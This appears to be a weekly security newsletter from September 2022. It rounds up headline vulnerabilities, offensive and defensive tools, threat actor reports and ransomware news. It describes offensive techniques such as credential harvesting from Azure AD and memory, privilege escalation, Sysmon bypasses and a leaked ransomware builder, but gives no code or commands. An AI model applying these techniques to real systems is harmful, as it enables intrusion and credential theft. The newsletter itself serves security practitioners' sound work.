SOC Goulash: Weekend Wrap-Up (Part 2)
19/09/2022 - 25/09/2022
This is Part 2 of the Weekend Wrap-Up, detailing significant vulnerabilities from the past week, in addition to the latest tools & techniques for offence and defence alike, and some additional reporting that you might find relevant and useful.
Part 1 should already be in your inbox, and highlights some significant Threat Actor Activity and noteworthy TTP changes to be aware of.
Headline Vulnerabilities
A flaw identified in Oracle’s Cloud offering - Oracle Cloud Infrastructure (OCI) - allowed users to access the virtual disks of other Oracle customers due to a lack of permissions verification in their AttachVolume API. To Oracle’s credit, they remediated the issue within 24 hours of disclosure, with no manual intervention or patching required from their customers;
The US Cybersecurity and Infrastructure Security Agency (CISA) warned of seven vulnerabilities in Dataprobe's iBoot-PDU power distribution unit product which could enable remote code execution attacks. The equipment is primarily used in industrial environments and data centers to control the power supply to devices and other equipment in an OT environment. Patches are available, for anyone running this kit in their environments;
Researchers at Sansec have warned of a spike in exploitation attempts for CVE-2022-24086, a critical RCE vulnerability in Magento 2. Despite being disclosed in February with a warning from CISA of active exploitation issued soon thereafter, it seems this vulnerability is still doing the rounds. Full details can be found in Sansec’s report;
Sophos has warned that an RCE vulnerability (CVE-2022-3236) in the User Portal and Webadmin interface of Sophos Firewall is being exploited in-the-wild. While the hotfix to address this flaw should be rolled out automatically based on default settings - you can also check to confirm it’s made it to your appliance. While you’re at it, it’d be worthwhile checking to make sure you’ve disabled WAN access to those portals - you don’t want to be that guy.
Offensive
CrackQL - a GraphQL password brute-force and fuzzing utility that exploits poor rate-limit and cost analysis controls;
LDAPNomNom - Anonymously brute-force Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP);
AzureAttackKit - A collection of tools to pull down for attacking an Azure environment from a windows machine or Cloud Shell. Or if you’d prefer a more manual review for selective download - check out this thread;
JuicyPotatoNG - A revival of the beloved JuicyPotato tool to help elevate privileges from a Service Account to System;
Bookmark this blog post on the many ways you can come at attacking Cisco networks - there’s plenty in there for pentesters of all levels;
Azure AD Conditional Access - what is it, and how to find and exploit flaws in its policy design;
This post builds on Secureworks’ earlier post, and walks you through how to create backdoors and harvest Azure AD credentials through flaws in Azure’s Pass-Through-Authentication;
Check out this post that builds on SpecterOps’ amazing work looking at abusing AD CS for domain escalation;
TrustedSec take a look at Kerberos FAST - which uses a separate key to encrypt parts of the authentication flow - and how mainstay tools like Rubeus and Impacket fare against it;
This is a really interesting walkthrough on how to relay YubiKey APDU packets (applicable to all PIV Smart Cards) to authenticate to remote systems;
How to pull Office JWT session tokens from memory and abuse them with the Outlook REST API (soon to be deprecated for Microsoft Graph API). If you want a script to help do it, here’s one in PowerShell & another in Python;
Remember GentilKiwi’s post from last week, noting that passwords are stored in user process memory when Citrix SSO is enabled? He’s just pushed a new release of Mimikatz that’ll help extract those creds. Check out this thread for more context;
Six bypasses for the newly added FileBlockExecutable event added to Sysmon v14;
Nestled in a huge thread on Azure Managed Identity attack paths, Andy Robbins has flagged that BARK’s Get-TierZeroServicePrincipals will help you discover all Azure Service Principals with Tier Zero privileges. it’s well worth reading the full thread for context on how and why this is useful;
Speaking of Azure attack paths - here’s a comprehensive post from Cloudbrothers looking at the myriad of ways you can come at it;
Andy Robbins has also used BARK to determine which Azure AD Admin and MS Graph App roles are abusable, and how.
Defensive
Microsoft have released Enhanced Phishing Protection, which aims to identify and mitigate corporate password entry on reported phishing sites or apps connecting to phishing sites, password reuse on any app or site, and passwords typed into Notepad, Wordpad, or Microsoft 365 apps;
Something you hope you never have to use but will be glad to have on-hand - a detailed checklist of practical Ransomware response steps;
Set-SACL - A PowerShell wrapper for Roberto Rodriguez’s Set-AuditRule script. Set-SACL automates the identification of Cloud credentials and setting SACL on those files to monitor attempts to access them;
This thread has a bunch of useful tips and resources to help implement and monitor Azure MFA and Conditional Access policies for your enterprise;
A Phishing campaign has highlighted the shortcomings of Microsoft’s Safe Links features, with re-written links giving users a false sense of security where it fails to detect a malicious site. For Defenders, it’s worth ensuring the parsing rules feeding logs into your SIEM also account for Microsoft’s Safe Links, and extracts the original URL for IOC matching & analysis!
The NSA have shared guidance for how to secure OT/ICS systems and assets.
Threat Actor Activity & Reporting
Okta have reported a huge spike in credential stuffing attacks, with over 10 billion attempts against Okta’s services in the first 90 days of 2022 alone. While it’s a low-fi method that is significantly hampered by MFA, as we’ve seen in the 0ktapus campaign and Uber hacks - they can always socially engineer their way around it if they care enough to;
SentinelLabs have kicked off their inaugural LabsCon security conference with a report and technical appendix (Google Doc) for Metador - a stealthy Spanish-speaking group that has operated since 2020 but only recently been uncovered having targeted telcos, ISPs, and universities in the Middle East & Africa;
Microsoft have shared insights on an incident where malicious OAuth applications were deployed on a compromised tenant to enable attackers to control Exchange Online settings and spread malicious spam from their Exchange environment;
This Dark Reading article highlights a recent trend of developers increasingly being targeted through the tools they use, such as Docker, Kubernetes, and Slack;
Australian telco Optus has disclosed a breach that resulted in the compromise of sensitive user data that includes their passport and driver’s license numbers and physical addresses. The attacker verified they were able to retrieve 11.2 million customer records from an unauthenticated API, and Optus have been offered the ultimatum of paying US$1 million in Monero for the data not to be sold on the dark web;
The latest in the Uber hack saga - they’ve blamed the notorious Lapsus$ extortion group, who they say abused stolen credentials for a 3rd-party contractor and performed MFA Fatigue attacks to pop their networks. UK police also arrested a 17-year old teen in connection with the hack, with the recent compromise of game developer Rockstar also added to their charges.
Cyber Crime & Ransomware
The builder for LockBit 3.0, or “LockBit Black”, has been leaked online, sparking fears of copycats and widespread deployment of the ransomware beyond their approved affiliates - as if they weren’t prolific enough. Here’s the builder, one of the early blog posts looking at it, and some technical analysis to get you up to speed;
Security researchers have warned that ChromeLoader, historically dropped as a Chrome extension that harvests browser-stored creds, is now "used to also drop ransomware, steal sensitive data, and deploy so-called decompression (or zip) bombs to crash systems";
Aquasec report that the crypto-mining group TeamTNT - who ostensibly went offline in 2021 - have returned with three new attacks being used in the wild;
Researchers at Avast have taken a look at Roshtyak - the DLL backdoor used by the USB-borne trojan dubbed Raspberry Robin. Brace yourself - Roshtyak is stuffed into as many as 14 layers of obfuscation and anti-analysis measures - “one of the best-protected malware strains [Avast researchers] have ever seen”;
Trend Micro have released a detailed 46-page profile on the prolific Cyber Mercenary crew they track as Void Balaur;
Technical analysis of the Crytox ransomware.
Misc
Andy Robbins, the absolute Chad that he is, has shared this comprehensive thread on how Azure Managed Identity attack paths crop up and are exploited by attackers;
For orgs that have the right Microsoft 365 license and want to control and track sharing of sensitive emails and information - check out this walkthrough of Office Message Encryption and how to set it up;
Planning a large-scale deployment/lift-and-shift operation, or been asked to look into the use of Infrastructure-as-Code? NCC Group have released an exhaustive and well referenced article to help you step through the process;
Michael Taggart has shared a free sample (Part 1) of his course on Python for Defenders;
Talks from VeloCon 2022 - hosted by the makers of the Velociraptor DFIR toolkit - are available online.